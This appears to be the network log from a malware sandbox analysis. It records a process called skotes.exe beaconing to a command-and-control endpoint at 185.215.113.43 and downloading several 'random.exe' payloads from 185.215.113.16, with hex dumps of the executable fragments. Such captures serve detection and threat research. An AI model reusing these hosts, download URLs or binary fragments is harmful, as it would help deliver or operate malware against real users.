                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:51.660120964 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985426903 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:52 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 1854464
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:06:09 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672dc1-1c4c00"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 27 f3 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g`I@I'@T0h 1 H@.rsrc X@.idata 0Z@ @*@\@lukocbxy/^@egyjeepiPI$@.taggant0`I"*@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985440016 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985455036 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985862017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985873938 CET1236INData Raw: d6 e6 84 bc 81 c5 01 70 a7 8f df 8f 87 af b1 98 5c ff 28 94 f9 66 06 1d 3a 42 5b ec 19 00 1c 37 ce d6 aa 27 84 9a 03 4f 09 46 1b 95 91 ee e5 1d 80 7f 02 cf f1 cd 1b 31 51 4f e1 4b 38 b7 e5 38 93 94 34 3e 0d 08 4f 5e 4c 19 a4 53 14 e1 4d 13 47 ea
                                                                                                                                                                                                                                                            Data Ascii: p\(f:B[7'OF1QOK884>O^LSMGaLf4[QARy$i.hg97ilAWPOA:Xg/AA3<v!-KTTErdRd}UE\t`tib JmxV\u1E-l
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.985883951 CET1236INData Raw: 8a 50 c1 4f 48 a0 24 bb f9 81 1c d1 63 78 69 f6 2c 9e 00 30 b6 e2 41 64 0c a0 60 93 c5 ca 21 1b d2 7c c8 2a 4c 92 6f a3 75 1e e1 8f 18 07 04 8e 1c 9e e1 5e 10 62 e7 7a db 4e ad b6 de f8 76 4d 38 46 bc 61 eb 8c aa b1 38 f2 08 4c 52 96 e1 17 2a 2e
                                                                                                                                                                                                                                                            Data Ascii: POH$cxi,0Ad`!|*Lou^bzNvM8Fa8LR*.Y0NCm'+in#Ursf( ]V|`.:[|rbo<_&v.5([L40~f{8 $F\)x"#@f#s,
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.986633062 CET1236INData Raw: c8 20 9a 04 08 3a 0c bc 46 f5 2d 94 21 46 da f3 38 3e 59 96 88 5f 58 f1 d1 69 f9 59 09 85 5e f6 4a 0b 9a 0f 28 01 90 48 a3 75 2d 15 7f c2 3a 45 14 39 e4 01 b9 ef 8b 1b 00 8d 97 2c 02 5e c2 c4 e0 1e 88 1e 48 be 57 96 25 f0 5e 0c 21 61 9d d6 0d 93
                                                                                                                                                                                                                                                            Data Ascii: :F-!F8>Y_XiY^J(Hu-:E9,^HW%^!amK"G7!b&((Pd:%ZBo5!q)Y,`#?E|[-!,"Ho4<'Fg1Tt1_j[8EE9%R`
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.986644983 CET1236INData Raw: 1a 9c 3b 51 10 17 31 f9 8c 87 47 12 60 7d 8f dd f0 54 0d 6f 51 05 20 51 c3 3f b5 20 9c 12 39 bd 54 9b 3c c9 4b c6 d3 6f 64 8a 29 ab 59 5f 26 90 52 ea 01 04 ee 68 a2 2f e7 88 e4 28 30 f6 3f f4 58 de 0c 0f 12 f3 f1 98 8e 34 4e fb 1b ae e1 7d 46 8c
                                                                                                                                                                                                                                                            Data Ascii: ;Q1G`}ToQ Q? 9T<Kod)Y_&Rh/(0?X4N}Fo+6@PGTU3"Y0Pb9n(+_/W4K+$ILuDiKNTsSiJma>?PA|igfIR06i[@[e1!9
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.986654997 CET1236INData Raw: f8 6f 9f 7b 48 8c 75 5f 4a 44 14 99 59 60 e5 e4 21 b8 44 3f d8 a7 22 8b 98 92 21 02 42 4f 1a 3f 91 92 1f d5 cf c3 0f 14 12 b6 b9 31 3c a8 59 96 d3 e4 17 90 e8 10 9a b4 8b fe da 1c 35 37 b2 9f 4d ba ce 8a ec 7b 9d 53 12 8f 9d 98 53 a4 e7 28 71 d8
                                                                                                                                                                                                                                                            Data Ascii: o{Hu_JDY`!D?"!BO?1<Y57M{SS(q[KPh6w*SXT%j`^0l:LdcM*eh0RhS|iVZgC^HM7E.G((MLs"mGb_g/s+mm4uq
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:52.987320900 CET1236INData Raw: 58 7e e0 8e aa 68 db 58 0c 75 cf d4 b4 4d 6d 58 89 69 45 2b 98 35 fd 24 8c 05 45 4b 4a 0f b7 55 48 ef da a4 89 67 93 08 ee 3f 4d 84 03 1f 58 61 0a 9f b7 8b 9a ce 51 8b 12 fe 41 db 48 90 11 1d 91 be b2 0a e7 24 3a 3d 2c 8e 72 4c 58 e8 44 27 61 d2
                                                                                                                                                                                                                                                            Data Ascii: X~hXuMmXiE+5$EKJUHg?MXaQAH$:=,rLXD'aAh)l;{n>Gc'wvPB=H0{e#)C\AD&~0mbX1K< 4ct+pih'tZ?}?K3~1{Tvqm,k?P}u{
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:53.105032921 CET1236INData Raw: 95 cc 2d 30 58 cf e7 1b c3 62 eb 00 9a 85 12 81 36 8e 20 ce 54 84 5c 2f 90 9d 64 21 f9 b8 7c 24 5c c0 7c 15 fa 94 94 4f 12 71 9c 12 41 1e 9b 1f f0 29 51 04 00 2e d1 17 f3 a3 04 68 9e 06 5c 83 cf 02 d4 71 61 be 17 25 0a 3c 9b 9d 11 fd 31 3a 5c a9
                                                                                                                                                                                                                                                            Data Ascii: -0Xb6 T\/d!|$\|OqA)Q.h\qa%<1:\{fZTAW2z/Ik!MI5wA[2{l}S=Dip&SGZ^}`uS8x[=9?OI#cBxWj4`UH(


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            15192.168.2.449820185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:58.913841963 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019670001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:00.214067936 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            16192.168.2.449822185.215.113.16801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:00.469603062 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.804681063 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:00 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 2871296
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:06:20 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672dcc-2bd000"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 4f 00 00 04 00 00 98 80 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(O@0O,@M$a$$ $h@.rsrc$x@.idata $z@hvxywfyw0*$.*|@megudfofN+@.taggant0O"+@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.804944992 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.804963112 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.805408001 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.805425882 CET1236INData Raw: 5e 21 63 84 a0 d9 7d 21 61 e6 be 98 6e 9e 21 42 1c ba e5 37 a0 96 2c 08 48 9e 5d 67 3c 1a 56 33 30 58 4e 1a 20 50 46 42 7b f4 38 c6 81 80 24 14 98 7e 36 18 94 0e 26 54 6c 9e 19 f1 06 af 0d e1 5c a2 01 f0 54 1c 56 18 5f c6 29 70 44 be e5 18 22 7f
                                                                                                                                                                                                                                                            Data Ascii: ^!c}!an!B7,H]g<V30XN PFB{8$~6&Tl\TV_)pD"sncfFS0RO/"D#/g<#dp*t+?9`2cUVFI9a$}_{^5{Aa:/9x~8~!.*!x\/p(,
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.805440903 CET1236INData Raw: 32 76 24 dc 3d 8e 5a 21 5d 9f 68 75 c8 d3 ba 89 91 b6 a1 d1 2e 7e f1 08 e7 7d 01 ac 2d ae 94 e9 d3 f8 e6 d6 24 fd c4 48 83 f1 fd 99 f8 f5 e5 43 4b 31 e7 b2 05 d5 80 48 27 39 ec 01 8f a0 33 8b e4 e7 22 b8 a4 0d e7 66 8c 0f 24 93 6c fe e5 84 ad 9d
                                                                                                                                                                                                                                                            Data Ascii: 2v$=Z!]hu.~}-$HCK1H'93"f$lysAQ(6kr,hRLlU(:m!!>N*]5^SW2R'G&FNMWT1o-!k[#4.IX ##A<V`ur%4u:IHBVw!Xa
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.806319952 CET1236INData Raw: 5e e9 4d 84 32 16 ff af a4 a8 eb 10 2d b7 9e 02 32 3a ef 97 5d 07 d6 1d 6e d8 95 11 e0 9e 01 a0 74 78 fb a5 e5 e6 ad 16 f8 1a 00 18 a8 db a9 59 2a 84 6c 19 24 b6 71 34 8d aa 90 1d fe 5a f6 1f 66 be f3 13 d8 07 06 9d 32 60 36 38 32 a6 2d 84 48 1f
                                                                                                                                                                                                                                                            Data Ascii: ^M2-2:]ntxY*l$q4Zf2`682-H&d2bPOfB2*O9^m~2B|"t}5! E'~C="8 @ "hAT!* 6,hw/D2&'lfv,>hwV,N"><E\#
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.806338072 CET1236INData Raw: 24 d1 f3 3c be c2 c5 8c a5 3d e6 1b bf 1d ca 4a 6c ac ed 63 a4 27 29 05 25 06 e6 15 9c db 3d 08 8a 11 7f 87 2c a7 1d 19 c0 1a 20 14 45 f8 4e 14 d4 ac fe cb 24 ae 68 90 68 2a 47 28 fc ac 1f fc 2d 46 6b 29 52 f1 e5 17 49 33 06 62 6c ea 4e 20 c0 d8
                                                                                                                                                                                                                                                            Data Ascii: $<=Jlc')%=, EN$hh*G(-Fk)RI3blN -82aP\d@2p]N9hp5YLS>!%a[6DEb^ =//\~ h$`,$B XE=l_U#ZM@& Z[0!.(-k"e
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.806354046 CET1236INData Raw: 00 9f 9e 8e 2e eb ee 13 60 44 e2 15 2c d2 21 ac a4 de 1c 4a f3 9e 05 3c b0 ca f3 20 c0 ab 06 87 a6 d6 f3 0f 6c 1a b6 8d 64 a9 26 05 90 f6 fa 15 bd 9e f9 89 a6 93 e8 86 e5 1b 4d 70 26 af 55 5b bc af 22 e4 2e 33 5e 85 32 1e 26 2f a8 2a ac 16 a4 26
                                                                                                                                                                                                                                                            Data Ascii: .`D,!J< ld&Mp&U[".3^2&/*&">`[#il6^8.7$Z"^<f,uAPF53;&H!`q$DAxQq^.$!7&l2b1~2aPN%K% |l5!alw7$Vb%>LG2Z
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.807199001 CET1236INData Raw: 90 ac ed 83 a0 92 69 45 22 98 84 7e 44 2a f7 41 b8 a7 59 8a 2e 83 df 31 2a 3a 62 16 cc b8 d5 82 4b 6d df 98 e8 52 1f 11 7c 23 e2 85 53 ab f3 e7 dd 97 0f 40 f0 1a 0a dc 3e ea 62 42 c7 b8 f3 e3 2d 82 e6 e7 bd d8 72 08 2f 26 89 80 32 9e 2a 88 40 23
                                                                                                                                                                                                                                                            Data Ascii: iE"~D*AY.1*:bKmR|#S@>bB-r/&2*@#g0d]++X+$CDBX2 D-"702^#!M<BwjLD+W!N69k5Uo2(N N\^I"j_tdI,4'Z4Heq"DV`pt/k
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:01.924396992 CET1236INData Raw: 3c a0 43 d7 0a ef f8 57 38 68 6c 53 66 ee 65 4d 6d 4a 2a 1e 48 ec b4 ee a6 c4 fc c3 b1 cc ff 53 29 b5 f1 55 a9 84 ff 0e 61 0c 0f 3e 0a 6c 2d ee 2d 87 fe c9 74 b4 41 d0 6c 2c ff 23 31 1b fa 87 58 7a 92 52 aa d7 a5 bc 24 3d b3 44 d0 c0 41 98 10 9f
                                                                                                                                                                                                                                                            Data Ascii: <CW8hlSfeMmJ*HS)Ua>l--tAl,#1XzR$=DAm-5!t)]as3XffVMEw/dGz&(!R-A[ky<%~s#kM'pDXgf1/jUGb0?PMV3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.449835185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:09.682193995 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019671001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:10.999279022 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:10 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            18192.168.2.449839185.215.113.16801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:11.239437103 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.542246103 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:11 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 966656
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:03:48 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672d34-ec000"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 25 2d 67 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 10 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL%-gg"w@ @@@d|@Tu4@.text `.rdata@@.datalpH@.rsrcT@V@@.relocuvJ@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.542367935 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                            Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.542428970 CET1236INData Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59
                                                                                                                                                                                                                                                            Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.542670012 CET1236INData Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00
                                                                                                                                                                                                                                                            Data Ascii: OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.542682886 CET1236INData Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00
                                                                                                                                                                                                                                                            Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.543205023 CET672INData Raw: 8b 8e 68 01 00 00 75 1a 8b 49 04 8b 45 08 41 89 08 5e c9 c2 04 00 e8 6a 09 00 00 eb f4 8b 40 30 eb a8 8b 49 30 eb e1 e8 cd 00 00 00 84 c0 75 0c 8b ca e8 c2 00 00 00 84 c0 75 01 c3 b0 01 c3 55 8b ec 51 51 56 57 8b 7d 08 8d 45 ff 50 8d 45 f8 c7 45
                                                                                                                                                                                                                                                            Data Ascii: huIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.543215036 CET1236INData Raw: 00 8b c8 8a d8 8b 37 4e 89 75 0c 89 75 cc 33 f6 8b 17 52 8d 42 01 89 07 e8 33 06 00 00 85 c0 74 26 84 db 75 22 8b 40 04 8b 00 66 39 70 08 75 e0 8b 00 83 e8 0b 74 42 83 e8 01 75 d4 85 c9 75 36 fe c3 89 55 d0 eb c9 8b 4d fc 8d 45 c8 50 81 c1 64 01
                                                                                                                                                                                                                                                            Data Ascii: 7Nuu3RB3t&u"@f9putBuu6UMEPdEM@M_^[IAUSV3PF3uMMWMU]MMMMEEfMTEXf\MEEfM`E
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.543226004 CET1236INData Raw: f4 00 0f 85 82 fc ff ff e9 db 03 04 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 d8 03 04 00 ff 45 f0 8d 45 ec 89 7d ec 8d 8d 78 ff ff ff 50 47 e8 af 01 00 00 8b 85 7c ff ff ff 89 45 c8 e9 49 fc ff ff ff 45 f8 8d 45 ec 89 7d ec 8d 8d 60 ff ff ff 50 47
                                                                                                                                                                                                                                                            Data Ascii: AjYf9HEE}xPG|EIEE}`PGdE%}U]/EHOxE}Ex|EEx;Vh6AjYf9HUJO
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.544315100 CET1236INData Raw: 18 14 4d 00 e8 be f1 ff ff 85 c0 0f 85 61 00 04 00 80 7c 24 12 01 0f 84 73 00 04 00 e8 59 00 00 00 e8 34 01 00 00 80 3d 04 14 4d 00 00 bb 90 19 4d 00 75 07 8b cb e8 f3 0c 00 00 57 b9 30 14 4d 00 e8 11 ac 00 00 80 3d 04 14 4d 00 00 75 07 8b cb e8
                                                                                                                                                                                                                                                            Data Ascii: Ma|$sY4=MMuW0M=MuD$8PIL$(m_^[]U4SVWj<Ihj8I54Ijc5XMh5XMMh5XMM3MVjjjjc5XMIXM
